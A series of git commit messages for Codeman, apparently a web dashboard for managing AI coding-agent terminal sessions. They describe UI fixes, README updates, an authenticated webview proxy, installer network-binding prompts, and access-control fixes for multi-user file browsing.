shell (zsh, fish, etc.) with rc files sourced, same fix as the local
shell-mode launch.
Also set remain-on-exit on the remote tmux session. It was only ever
set on the local socket, so if the remote command exited for any
reason -- even something transient -- tmux destroyed the pane, window,
and (being the only session) the whole remote server, tearing down the
local ssh attach along with it and leaving no trace to diagnose. The
local pane saw this as an instant clean exit, and reconnect's -A then
created a fresh session, which could repeat as a flap loop with no
evidence surviving between attempts.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Extends the Gemini gating from bb7fb9e to the other welcome-screen
buttons that had the same problem: shown unconditionally even when the
underlying CLI isn't installed.
- Add isClaudeAvailable() (claude-cli-resolver.ts) and GET
/api/claude/status, mirroring the existing opencode/codex/gemini
resolvers and status endpoints.
- Opencode already had a working /api/opencode/status the welcome
screen just wasn't checking; wire it up the same way.
- Refactor loadGeminiAvailability() into a shared
_loadCliAvailability(buttonId, statusUrl) helper instead of
duplicating the fetch/try-catch three times.
Run-mode dropdown entries (Opencode/Codex) are intentionally left
unconditional here — follow-up PR.
- Remove the always-visible Cloudflare Tunnel welcome button and QR
widget; offering it regardless of whether cloudflared is installed
is a bad default.
- Hide the "Run Gemini" welcome button by default and only show it
when /api/gemini/status reports available:true, via new
loadGeminiAvailability() called from showWelcome().
Follow-up to the welcome-screen gating (#200): the run-mode dropdown
(gear menu next to Run) had the same problem — Claude/Opencode/Codex/
Gemini entries were always shown regardless of whether the CLI is
actually installed, so picking one could spawn a session that
immediately errors out.
- Add _refreshRunModeAvailability() (session-ui.js), called each time
the dropdown opens; hides entries whose /api/<cli>/status reports
unavailable.
- Shell is intentionally never gated (no external CLI dependency).
Depends on isClaudeAvailable()/GET /api/claude/status, which don't
exist on upstream/master yet — duplicated here from #200 so this PR
is self-contained and independently mergeable. Once #200 lands this
branch should be rebased onto master, which will collapse the
duplicate cleanly.
Two independent ways a tab description could be typed in and silently lost.
1. Session Options modal (deterministic). The Session Name input saves on
blur, and every autosave handler in the modal bails on a null
editingSessionId. closeSessionOptions() cleared that id BEFORE hiding the
modal, and hiding it is what blurs the input, so the save always ran too
late and returned early. Escape and backdrop-click lost the name with no
PUT at all; only the X button worked, because mousedown blurs the input
before the click handler runs. Fix: blur the focused modal field first,
then clear the id. That also covers the auto-compact prompt, which saves
on change and had the same fate.
2. Right-click inline rename (racy). The _inlineRenameActive guard from #81
sits in renderSessionTabs() (the scheduler) and _fullRenderSessionTabs(),
but not in _renderSessionTabsImmediate() (the debounced executor). A
render queued in the ~100ms before the rename opened still fires and the
incremental branch rewrites .tab-name's innerHTML, destroying the input
mid-keystroke: it commits a truncated name, or, if it lands before the
first keystroke, closes the rename so everything typed after goes
nowhere. Fix: guard the executor too. finishRename() re-renders on both
commit and cancel, so a render dropped there is picked back up.
Verified end-to-end against a live server on an isolated instance: all three
modal close paths now persist the name, and the rename input survives a
render mid-typing. Both regression tests were checked to fail with their fix
reverted; the render one was vacuous at first because the synthetic tab sat
on <body> instead of inside #sessionTabs, so it now builds the tab in the
real container.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Release 1.9.8 (aicodeman) and 0.1.8 (xterm-zerolag-input).
Fixes macOS session start (`posix_spawnp failed.`, issues #6 and #204):
node-pty ships its macOS spawn-helper as mode 0644 and macOS launches every
PTY through it. `scripts/fix-node-pty.mjs` (npm run fix:node-pty) chmods every
helper, prebuilds/ included, then verifies by really opening a PTY; the blind
Node-22+ rebuild is gone. `spawnPtyWithHelperRepair()` self-heals an already
broken install on the first failed spawn.
Adds the phone home screen (session overview under 430px, per-device
`mobileOverviewEnabled`, default ON) and a guided Tailscale path in
install.sh, plus `install.sh tailscale` to retrofit it.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
pr/ holds machine-local promo drafts that are never meant for git. Anchored with
a leading slash so it matches only the root dir, matching the /public entry below
it, rather than swallowing any nested pr/ elsewhere in the tree.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Adds Antigravity as a sixth CLI backend alongside Claude Code, shell, OpenCode,
Codex and Gemini, following the existing pluggable-resolver pattern.
- `utils/antigravity-cli-resolver.ts` resolves the CLI, mirroring the other
resolvers; `GET /api/antigravity/status` reports availability and path.
- `ANTIGRAVITY_*` joins the `ALLOWED_ENV_PREFIXES` allowlist in schemas.ts, so
env overrides stay CLI-scoped rather than blanket-forwarded.
- Session, tmux-manager, mux-interface and types carry the new mode; secrets are
injected via socket-scoped `tmux setenv`, never on the spawn command line, so
the mode requires tmux with no direct PTY fallback like the other external CLIs.
- Frontend: Run-dropdown entry, agent-type option, `ag` tab badge and toolbar
colours. `runAntigravity()` routes remote/docker cases through
`POST /api/quick-start` and skips the local status probe for them.
Tests: test/antigravity-mode.test.ts, plus run-mode-ui and system-routes coverage.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
All OFF by default (the `legacy` theme), so an untouched install behaves exactly
as before and every mark/apply hook short-circuits on its first line. Opt in via
App Settings > Appearance > Entrance Animations; per-surface control and a live
preview lab at ?animlab=1.
Surfaces and styles:
- Tabs: slide, pop, crt, unroll, boot, flip. A batch launched together cascades
by a configurable stagger.
- Terminal pane: crt, boot, wipe, slide, fade.
- Agent windows: fly (the pre-existing tab-to-window flight, still the default),
crt, materialize, unfold, beam, pop.
- Connection lines: draw, packet, fade.
Three constraints drove the design:
1. Tabs and connection lines are DESTROYED mid-animation on every re-render:
_fullRenderSessionTabs() replaces the strip's innerHTML and
_updateConnectionLinesImmediate() does `svg.innerHTML = ''`, both of which run
constantly while sessions and agents spawn. Each is tracked by id and
re-applied to the fresh element with a NEGATIVE animation-delay so it resumes
at the same offset instead of restarting or snapping. Verified on the real
path: a forced rebuild mid-draw resumed at -0.243s.
2. Terminal-pane styles animate transform/opacity/clip-path ONLY. xterm's
FitAddon derives rows+cols from getComputedStyle(parent).width/height, the
untransformed layout box, so transforms are invisible to it; animating
width/height/padding would have resized the PTY. Verified by forcing
fitAddon.fit() eight times mid-animation: dimensions held at 178x38.
3. A window entrance that transforms also moves the rect its connection line
aims at (crt drifts it 109px, pop 81px). `beam` animates opacity/filter only
(0px drift) so its line can draw toward a stable target; the others refresh
the lines on animationend.
Also fixes: an agent window spawning hidden (its agent belongs to a background
tab) is display:none, so its animation never runs and animationend never fires,
which left the entrance class and its inline custom property stuck on the window
permanently. Hidden windows now skip the entrance entirely.
Styles persist to their own codeman:*Anim localStorage keys, keeping them
per-device without touching the .strict() SettingsUpdateSchema.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
start() reassigns _claudeSessionId to `resumeSessionId || id` on every launch,
including the path that re-attaches to a mux session that outlived the restart.
A pane whose CLI had moved on via /clear therefore came back pointing the
response viewer at its pre-/clear transcript, and because Session.lastSubmitAt
lived only in memory, the history correlation had nothing to correct it with
until the user happened to type again — observed as hours of the eye showing a
conversation the pane had long since left.
Persist lastSubmitAt in SessionState, restore it in restoreMuxSessions(), and
flush it when the viewer adopts (a /clear emits no completion event, which is
the trigger that would otherwise have persisted it). Recovered panes now
re-derive their live conversation on the viewer's first poll.
Restoring a stale anchor is safe: the resolver already refuses a candidate
transcript older than the one the pane is currently on, which is the shape of a
respawn into a fresh conversation.
The viewer re-derived a pane's live conversation from the newest
~/.claude/history.jsonl entry for the pane's cwd. A cwd is shared with every
other Codeman tab on it, with tabs long since closed, and with any plain
`claude` the user runs in their own terminal, so the eye followed whichever of
those was typed into last — and since the match was written back through
adoptClaudeSessionId(), the mispin stuck.
Credit a history entry to a pane only when it lands within 10s of that pane's
own Enter and no other pane on the same cwd submitted closer, reusing the
last-submit correlation the Codex locator already relies on. Submit tracking
moves from _codexLastSubmitAt to a mode-agnostic Session.lastSubmitAt. With no
correlated entry the pane keeps the id it has: a viewer one turn behind beats a
viewer showing someone else's conversation.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Follow-ups from the PR #175/#176 reviews:
- Rewake helper self-terminates on its own 6h deadline and when orphaned,
instead of relying on Claude Code to reap the poller
- Rewake marker versioned (V2) with a version-agnostic ownership prefix, so
future script updates replace older handlers instead of duplicating them;
regression test covers the V1 to V2 swap
- HOOK_TIMEOUT_MS renamed to HOOK_TIMEOUT_SECONDS = 10: the hook timeout
field is seconds (the CLI multiplies by 1000), so the curl hooks have
effectively had a ~2.8h timeout since COD-54
- Test echo PTY switches to raw mode: each input byte echoes exactly once
(tty line discipline doubled every line and buffered until Enter)
- test/setup.ts: drain in-flight console-log rpc forwards before environment
teardown (fixes the EnvironmentTeardownError that failed CI twice on the
merge commit with all 3820 tests passing), clean the temp home on process
exit (fully-skipped files leaked it), fix the Windows Playwright cache
fallback path
- test/webview-proxy.test.ts: stop naming the vitest environment directive in
prose; vitest matches it inside comments and silently ran the whole file
under the jsdom environment while the comment claimed node
- CLAUDE.md: document the temp-HOME and echo-PTY test isolation
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The workspace publishes two packages, changesets creates a GitHub release
for each, and GitHub awards "Latest" to whichever was published last. That
is a race: 1.9.2 kept the badge, 1.9.4 lost it to xterm-zerolag-input@0.1.7
by two seconds. Set make_latest in the rename PATCH, which runs after every
package release already exists.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
PUT /api/settings service toggles now resolve from `merged` (persisted +
incoming) instead of the raw request body, so a partial PUT no longer
starts the subagent watcher and stops the workflow + image watchers by
treating every omitted key as "apply the default". Pinned by a 4-case
regression test verified to fail against the old handler.
Also trims the links line from the Codeman callout in the
xterm-zerolag-input README.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Plan-usage chip defaults ON on desktop (handhelds stay OFF), resolved
through a single planUsageChipEnabled() helper so the checkbox, the chip
and the create-time statusLineTelemetry flag cannot disagree. Correct the
stale "Cron button defaults ON" comment (it is OFF in code, template and
CSS) and the styles.css comment claiming the server strips the chip's
hidden class.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Replace the misaligned 8-line keystroke-flow diagram (its branch sat two
columns off the junction it attached to) with a two-lane contrast that
makes the same point in two lines: stock xterm.js waiting 300ms vs the
overlay painting immediately. The mechanism detail it was annotating
moved into the following paragraph.
Add a Codeman callout between the badges and the demo GIF, with links to
getcodeman.com, the install one-liner and the repo, and rewrite the
bottom Origin section so it argues credibility instead of repeating the
promo.
Not released: the npm page updates only on publish, so the next COM
needs an "xterm-zerolag-input": patch changeset for this to ship.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Rewrite the xterm-zerolag-input README (hero demo GIF, value-first
structure) and fix its drift against the source: 175 tests not 78,
CJK/emoji wide-char support documented instead of listed as a
limitation, setPrompt() documented.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Only CLAUDE.md conflicted: master restructured it into the short-rule +
docs/architecture-invariants.md pointer layout while this PR was open.
The response-viewer detail now lives in architecture-invariants, so the
Claude turn-grouping and restored-placeholder rebind notes moved there.
Changeset rewritten to record the measured effect on real transcripts.
- One compact Mobile-Optimized Web UI section: the two current screenshots
(mobile-session-keyboard, mobile-toolbar-enter) side by side, comparison
table, condensed feature bullets, then QR auth
- Drop the outdated black-background phone screenshots
(mobile-landing-qr.png, mobile-session-active.png)
- Same restructure in README.zh-CN.md
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Both picker endpoints are a second file-serving surface, and they
inherited neither the attachment guard's confinement nor its ownership
scoping. Two separate holes:
1. `sessionId` contributes that session's workingDir as a browse root,
but it was resolved straight off ctx.sessions/ctx.store with no owner
check, unlike the nine other session-scoped handlers in this file. A
non-admin could pin ANOTHER user's working directory as a root just
by passing their session id, then list and preview underneath it. Now
runs canAccessOwned and reports 404, which also avoids confirming
that a session id exists.
2. `Home` and `CASES_DIR` were unconditional roots for every caller.
Per-user spaces live at <USER_SPACES_DIR>/<username>, which is INSIDE
homedir(), so the Home root alone exposed every other user's
workspace. A multi-user non-admin now gets only their own
userSpacePath plus anything explicitly listed in
CODEMAN_FILE_PICKER_ROOTS. /mnt/d is dropped as well: a broad host
mount should be an explicit operator decision in a multi-user
deployment, and operators who want it can name it in that env var.
Admins and single-user mode keep the host-wide roots, so behavior is
unchanged unless CODEMAN_MULTIUSER is on (opt-in, off by default).
All three discriminating tests were verified to fail against the
previous code: browse and preview both returned 200 instead of 404, and
the roots came back as [Home, Codeman Cases, ...] instead of [My Space].
Full suite green, 3784 passed.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The zerolag composition renders on a pure black page background, which
read as an outdated screenshot when placed right under the hero. Top of
the README now shows only the current-skin visuals (subagent gif + tour).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- Move the install one-liner (curl getcodeman.com/install | bash) and value bullets to the top so the pitch and quick start fit in the first scrolls
- Promote Zero-Lag Input Overlay to right after the hero, with a new side-by-side phone demo gif generated from the current zerolag master
- Switch all install commands (incl. WSL) to the getcodeman.com short URL
- Remove outdated screenshots (multi-session-dashboard.png, ralph-tracker-8tasks-44percent.png) and the old zerolag-demo.gif
- Remove Ralph tracker content: tracking section, API table, CLI example, autonomy-table row, architecture-diagram node
- Mirror all changes in README.zh-CN.md
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The short-code distribution test asserted that no base62 character
deviated more than 15% from its expected count. That statistic is the
maximum over 62 correlated near-normal cells, so its tail is fat: at
n=36000 the per-cell relative SD is ~4.1%, which puts the 15% bound at
|z| ~ 3.65, and taken as a max over 62 cells it fires on a perfectly
uniform generator about 1.6% of the time. Measured directly: 48 spurious
failures in 3000 simulated runs. It had been rerun-to-green repeatedly
and most recently red-herringed a PR review.
Chi-square is the correct test for "is this multinomial uniform", and
unlike 0.15 its threshold is derivable. df=61, Wilson-Hilferty puts the
p=1e-6 critical value at ~129, so the bound is 130.
Power is unchanged. Removing rejection sampling from generateShortCode
reintroduces modulo bias (256 % 62 = 8, so eight characters draw five
chances per 256 instead of four) and was verified against the real code
in an isolated worktree: chi-square 243.06 against the 130 limit. The
threshold sits in a wide empty gap, 3000 clean runs peaked at 104 while
200 biased runs bottomed out at 174.5.
Also iterate the alphabet explicitly rather than the observed keys, so a
character that never appears counts as zero instead of being skipped.
Verified: 30/30 consecutive runs of the real test pass.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Only CLAUDE.md conflicted: master restructured it into the short-rule +
docs/architecture-invariants.md pointer layout while this PR was open.
Route counts reconciled against master's numbering (files 14 -> 16 for
the two new filesystem endpoints, total ~197 -> ~199) and the path
picker's detail moved into architecture-invariants under its own
section.
The light skins themed the app chrome, but a class of status badges and
accent-tinted pills still hardcode pale light-on-dark ink (#cdddff,
#9dc0ff, #ffc107, #fff) over a low-alpha tint. Measured on a rendered
page, that lands at 1.0 to 1.9:1 under all four light skins: the search
filter chips (Sessions / Events / Files) render as empty blue pills.
Re-point the ink at each skin's own dark tokens and keep the tint as the
category signal, which moves the same components to 3.2 to 14:1.
Also pin --floating-bg on the OG skin. The new :root default is slate
rgba(31,38,48,.96), which suits the Daylight palettes (their glass
header is already rgba(31,38,48,.85)) but repaints OG's modals, command
palette and floating windows away from the neutral near-black that skin
is built on.
Verified against a live instance across all seven skins, plus a real
shell session for terminal ANSI output. Full suite green.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Both were unreferenced by either README and are now kept in Ark0N/gittrend
under assets/codeman-demos, alongside the source recordings they were cut from.
As with the GIF removal, this does not shrink the repository: the blobs remain
in history and only new checkouts stop carrying them.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Neither README references it: both switched to the dated
subagent-demo-20260724.gif in 8e9f254, which kept this file only so external
hotlinks would keep resolving. Removing it now at the maintainer's request.
Note this does NOT shrink the repository. The blob stays in history, so clone
size is unchanged; only new checkouts stop carrying the 29MB file. Actually
reclaiming the space needs a history rewrite, which would invalidate every
existing clone and is a separate decision.
The three capture scripts that write docs/images/subagent-demo.gif are
unaffected: they create the file, they do not read it.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Three separate truncations, each cutting a clickable link short so it opened the
wrong target (or nothing at all).
1. A single `&` ended the match. It is a query-parameter separator, so every real
query string was cut: a WordPress edit link resolved to `?post=1479` and opened
the post list instead of the editor, and Claude Code's own `/login` URL was not
usable at all. `&` is now part of a URL; `&&` stays a boundary, since that is
the shell operator and never appears inside one. A lone trailing `&` is still
trimmed as punctuation.
2. Links longer than the terminal is wide were cut at the row boundary. xterm
calls the link provider once per visible ROW and translateToString returns only
that row, despite a comment here claiming it handled wrapping. The provider now
stitches the continuation rows back into one logical line and maps match offsets
back to (x, y), so a link can span rows.
Two kinds of continuation exist and handling only the first is not enough. A
SOFT wrap is the emulator running out of columns, which flags the next row
`isWrapped`. A HARD wrap is the program wrapping its own output and emitting a
real newline, which flags nothing: Ink does this, which is why the /login URL
was cut at the window edge and why the clickable part grew when the window was
widened. A row that fills the full width is now treated as continuing into the
next, that being the only trace a hard wrap leaves behind. Bounded to 12 rows so
a screenful of wide output cannot make every hover re-scan the viewport.
3. Image and PDF paths were not matched at all. `.claude-images/paste-*.png`, what
Codeman writes for a pasted screenshot, rendered as plain text. Those extensions
are now linked and open the file preview, which renders images inline, rather
than the log viewer, which would show binary noise.
Verified in a real terminal: a 450-char /login URL hard-wrapped across 5 rows with
zero isWrapped flags in the buffer (so a genuine hard wrap, not the soft case)
links intact, as do soft-wrapped URLs and a wrapped attachment path. Regression
cases added to link-provider-regex.test.ts, which extracts the patterns from the
shipped source so they cannot drift. Its existing ReDoS guard still passes, which
matters because this changes a pattern that once froze the tab on hover.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Adds a "Web / URL" section to the Run dropdown. A saved URL renders as a tab in
the same strip as Claude/Codex/Gemini sessions, with the same Alt+1..9 numbering,
so Codeman is one mission control instead of Codeman plus a pile of browser tabs.
A webview is NOT a sixth SessionMode: no PTY, no tmux, no respawn, no idle
detection. It is a separate resource sharing only the tab strip and the main
content area, the same call that keeps Docker and remote-SSH as case overlays.
Dashboards are proxied through Codeman's own origin, because a direct iframe
fails three ways at once in the shipped deployment: prod serves HTTPS behind
tailscale serve, so http:// targets are hard-blocked as mixed content (with no
override at all on iOS Safari); Grafana/Portainer-class dashboards send
X-Frame-Options: DENY; and our own default-src 'self' CSP blocks cross-origin
frames. Proxying dissolves all three and leaves the production CSP byte-for-byte
unchanged, since /webview/... is already covered by 'self'. A useful side effect:
the fetch happens server-side, so a tailnet-only dashboard is reachable from a
phone that is not on the tailnet.
The proxy is not an API surface. It authenticates on a 192-bit capability in the
path (memory-only, rolling TTL, bound to the minting user, revoked on edit or
delete) and is correspondingly exempt from the cookie and Origin checks, because
a sandboxed iframe is opaque-origin: it sends no SameSite=lax cookie and its
writes arrive with Origin: null. The Host allowlist is never bypassed. A second
Referer-keyed form of the exemption exists for root-absolute assets and is fenced
to safe methods on non-/api, non-/ws, non-/q paths.
Iframes omit allow-same-origin unless a URL is explicitly marked trusted, since a
proxied page is served from Codeman's own origin and could otherwise read this
document and drive the agent-spawning API. Authorization and codeman_session are
stripped upstream in BOTH modes, so CODEMAN_PASSWORD cannot leak into a dashboard.
Two things only a real browser reveals, both presenting as the dashboard's own
"Failed to fetch" while the page itself renders fine:
- Runtime-built root-absolute URLs (fetch('/api/data')) escape <base href> and
land on Codeman's root. Widening the Referer fallback into /api would trade
security for it, so an injected shim patches fetch/XHR/WebSocket/EventSource
inside the frame instead, removing the class rather than the guard.
- An opaque-origin document CORS-checks every request, including to the host it
was served from. Script/css/img loads are not CORS-checked, which is why the
page renders while its API calls die. The proxy now emits CORS headers and
answers preflights itself. registerSecurityHeaders answered every OPTIONS with
a bare 204 before routing, carrying no ACAO for Origin: null, so that
short-circuit now exempts a valid capability.
Neither is reproducible with curl, which does not enforce CORS.
Also fixes a pre-existing bug found on the way: .toolbar has backdrop-filter,
making it a stacking context that trapped .run-mode-menu's z-index:1000, so
.welcome-overlay painted over the whole Run menu. With no session open, every
item in it (Claude Code included) was unclickable.
Verified end to end against a real tailnet dashboard: live data, WebSocket push,
no failed requests, and switching tabs does not reload the frame. 98 new tests
cover the pure rewrite helpers, the CORS helper, the shim's rewrite logic, route
CRUD, and every edge of the auth exemption.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Feature + layout changes:
- Phone toolbar: Enter replaced Shell below 430px; shell launching moved into
the Run dropdown. Documents the ordering (setRunMode -> run -> runShell) and
that runMode is a loose string server-side so new modes need no schema edit.
- Repo root layout: config/ holds knip.json, Prettier config is the package.json
"prettier" key, SECURITY.md is under .github/, and the list of files that must
stay at the root with the reason each one is pinned there.
- Pointer to docs/SPEEDRUN.md, which nothing linked to after the move.
Traps worth not rediscovering:
- sendEnterKey MUST use triggerDataEvent, not sendInput or a raw POST. Local
echo is on by default on touch devices, so typed text is buffered client-side
and a bare CR submits an empty line while the text stays stranded. Cost me two
wrong fixes before the real cause surfaced.
- styles.css nests skin overrides under html:not([data-skin="og"]), giving a
bare .btn-toolbar rule (0,2,1) which outranks .btn-toolbar.btn-x (0,2,0) in
mobile.css whatever the load order. Explains why mobile.css needs !important.
- Browser tests pass vacuously on mobile input: sendInput() bypasses the overlay,
and headless Chromium reports isTouchDevice() false even with hasTouch, so the
local-echo branch never runs. Assert on overlay state and the tmux pane.
- The working tree is shared with other agent sessions: check the branch before
every commit (a commit silently landed on feat/web-tabs today and the push to
master reported "Everything up-to-date"), push with HEAD:master rather than
checking master out, and never git add -A.
- COM step 5 no longer tells you to git add -A, which has swept another
session's WIP into a release before.
Verified: 33 relative links and 30 invariants anchors all resolve, and every
factual claim re-checked against the tree.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Continues trimming the repo root so the README is reached with less scrolling.
Root files: 19 -> 15 across both passes.
- knip.json -> config/knip.json, joining eslint.config.js and the vitest
configs. `npm run knip` now passes --config explicitly. Verified by A/B: the
run from the new location produces byte-identical findings and the same five
configuration hints as from the root, so knip resolves its globs relative to
cwd rather than the config file. Those hints are pre-existing, not caused by
the move.
- .prettierrc -> the "prettier" key in package.json, a config source Prettier
reads natively, so editor format-on-save keeps working with no --config flag
anywhere. Verified live: `npm run format:check` still passes across src/**,
which it could not if the config had been lost (Prettier's defaults are
double quotes at 80 columns and would flag nearly every file).
.prettierignore deliberately stays at the root: Prettier resolves it relative
to cwd, so moving it would require threading --ignore-path through every
script and would break editor integration.
Everything else in the root is load-bearing: .editorconfig (walks up from the
edited file), .nvmrc/.npmrc (read from the project root), tsconfig.json (bare
`tsc` discovers it), LICENSE (GitHub license detection), install.sh (its raw
URL is the published one-liner in the README and cannot move without breaking
every copy in the wild), plus the five documented .md files.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Trims the repo root listing so the README is reached with less scrolling.
Only these two were movable; the other five root .md files are load-bearing
and stay put:
- README.md / README.zh-CN.md — the landing page and the language-switcher
entry point
- CLAUDE.md — Claude Code loads project instructions from the ROOT path;
moving it silently breaks every future session in this repo
- AGENTS.md — the agent-convention file Codex reads from the root and injects
as context (see the comments in session-routes.ts)
- CHANGELOG.md — the changesets default writer emits it next to package.json,
so moving it breaks `npm run version-packages`
GitHub officially resolves .github/SECURITY.md, so the Security policy tab
keeps working. Inbound links updated in both READMEs, CLAUDE.md and
docs/versioning-policy.md. CHANGELOG.md also names SECURITY.md but is left
alone: it is a historical record, not a live reference.
The move broke a link the other direction too: SECURITY.md pointed at
docs/security-architecture.md, which from .github/ resolved to
.github/docs/... — repointed to ../docs/. All relative links in the six
touched files verified resolving (62 links, 0 broken).
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two captures from an actual phone, replacing the placeholder-ish shots:
- Mobile table, middle cell: the full-height capture with the keyboard open,
showing the accessory bar and the new Enter button while answering a plan
prompt. Supersedes mobile-session-question-20260727.png from this morning,
which showed the pre-Enter toolbar.
- Touch-Optimized Interface: the cropped toolbar capture as a standalone
560px figure, where a near-square crop reads better than it would squeezed
into a 260px table cell.
Picking the tall capture for the table also fixes a row the earlier square
shot had left lopsided: the three cells now render 473 / 482 / 469px tall
instead of 473 / 263 / 469.
Adds a "Dedicated Enter button" bullet documenting the behaviour, including
why it replays the keypress (local-echo flush) rather than sending a bare
carriage return, and that shell launching moved into the Run dropdown.
Both READMEs updated so EN and zh-CN stay in sync.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
On phones the toolbar slot held "Shell", which starts a rarely-needed session
type. Sending Enter is a constant need on a touch keyboard, so the slot now
holds a dark blue Enter button and shell launching moves into the expandable
Run dropdown (Terminal / Shell, label "Run SH"). Desktop and tablet are
unchanged: the green Run Shell button stays exactly where it was.
Enter goes through xterm's own input path:
coreService.triggerDataEvent('\r', true)
NOT through sendInput() or a direct POST to /input. localEchoEnabled defaults
to MobileDetection.isTouchDevice(), so on a phone the characters you type are
buffered client-side in the LocalEchoOverlay and have never reached the PTY.
The onData Enter branch in terminal-ui.js is what flushes that buffer before
sending \r. A bare \r submits an empty line and leaves the typed text stranded
on screen, which presents as "the Enter button does nothing". Replaying the
keypress reuses the overlay flush, the flushed-offset cleanup and the 80ms
text-before-CR ordering instead of reimplementing them.
Verified with local echo forced on: before the fix the overlay still held
"echo OLD_WAY" after Enter; after it, pendingText is empty and the command
executes in the pane.
The !important on the Enter button's colors is required, not habit: styles.css
nests its skin overrides inside `html:not([data-skin="og"]) { … }`, so a plain
.btn-toolbar there resolves to (0,2,1) and outranks .btn-toolbar.btn-enter at
(0,2,0). Without it the button renders in generic toolbar grey.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Replaces the middle cell of the Mobile-Optimized Web UI table in both
READMEs. The new shot shows an agent's multiple-choice prompt being answered
on a phone, with the touch accessory bar and bottom toolbar visible, which
demonstrates more of the mobile UI than the old idle-session capture.
Uses a dated filename per the convention the other 2026-07 images follow.
That also avoids GitHub's image cache serving the old picture, which an
in-place overwrite of mobile-session-idle.png would have risked. The old
file is left on disk so any existing external link to it keeps working.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two live shields.io badges in the header block of both READMEs, linking to
the contributors graph and the commit history. Colors reuse the existing
palette (3b82f6, 1e3a5f) and keep the flat-square style.
Verified both endpoints render real data matching the GitHub API
(contributors: 13, commits: 1.5k against 1,460 on master) and that master
is the default branch, so the /commits/master link target is correct.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
CLAUDE.md was 110KB (~27.5k tokens) loaded into every session, with 30 lines
carrying 49% of the bytes as single-paragraph walls (the Docker cases entry
alone was 9,388 chars). Extract the implementation detail verbatim into
docs/architecture-invariants.md (41 sections) and leave the rule plus a
pointer inline. Result: 59.5KB, ~14.9k tokens, 46% smaller.
Also:
- Add CLAUDE.md to .prettierignore. Prettier's markdown printer escapes
underscores in the glob-heavy paths used throughout, which had already
corrupted the Ultracode paragraph (agent-*.jsonl became agent-\_.jsonl,
collapsing backtick spans). npm run format:check is unaffected; its globs
are src/** only.
- Move version archaeology (PR numbers, ticket ids, commit shas, "was X now
Y" lineage) into the invariants doc, keeping the rules and their reasoning
inline.
- De-duplicate the Core Files table against Key Patterns.
- Document install.sh in Scripts, and why Prettier's scope is deliberately
narrow (14 hand-formatted public JS modules are guarded by
check:public-assets and check:frontend-syntax instead).
Two factual fixes found while verifying: displayKeys is a client-side merge
policy, not a wire filter, and showResponseViewer / showPlanUsageLimits /
language are declared in SettingsUpdateSchema and do persist server-side; and
the respawn route count is 7, not 18.
Verified: 30/30 cross-doc pointers resolve, 1,184 of 1,190 backticked
identifiers from the original survive (the 6 others are dropped archaeology
or the prettier-corrupted spellings), 59 table rows well-formed,
format:check and check:frontend-syntax clean.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Replaces the dated subagent-spawn.png with the recaptured floating-windows
still (clean header, three haiku Explore agents, connector lines) and adds
the live ultracode workflow-run window below the feature bullets, in both
READMEs. Dated filenames so caches never serve a stale render.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Replaces the 29MB subagent-demo.gif reference with a recaptured 6s loop:
three haiku Explore agents pop as floating windows (25fps through the pop,
bayer dither, 1080px) on the new clean header. Adds the annotated dashboard
tour screenshot below the feature bullets in both READMEs. Old GIF file kept
on disk so external hotlinks stay alive; new files use dated names so caches
can never serve a stale render.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The default desktop header right cluster is now: WS, CPU, MEM, File Viewer
folder button, 5H/7D plan-usage chips, gear. The token-count chip and the
lifecycle-log document button default OFF (both still honor stored prefs),
and the File Viewer button defaults ON (phones keep hiding it via mobile.css).
Templates ship the hidden/shown state so nothing flashes before settings load.
Capture scripts seed showTokenCount:false so screenshots match regardless of
server defaults.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Updating must never silently loosen security. The update path already never
rewrites service files; this covers the remaining gap, re-running the full
installer over an existing setup:
- read_existing_binding() parses the current systemd unit or launchd plist
(a pre-1.8 service without our env lines counts as loopback).
- The network-access prompt defaults to the CURRENT setup instead of the
network default, shows what that setup is, and Enter keeps it, including
a custom non-loopback host and the existing password.
- Non-interactive re-installs adopt the existing binding wholesale.
- The update path's closing security notice now reflects the service's
actual binding instead of the generic loopback text.
Round-trip escaping tested for both formats (quotes, backslashes, XML
specials) plus the legacy-unit, preserve, and Enter-keeps flows.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The loopback-only default was safe but left most installs unreachable from
the devices people actually use. The installer now asks at the end of setup:
1) Any device on your network (0.0.0.0), the default. Prompts for a
dashboard password (confirmed twice); skipping it requires an explicit
confirmation and prints a big red warning as the final output.
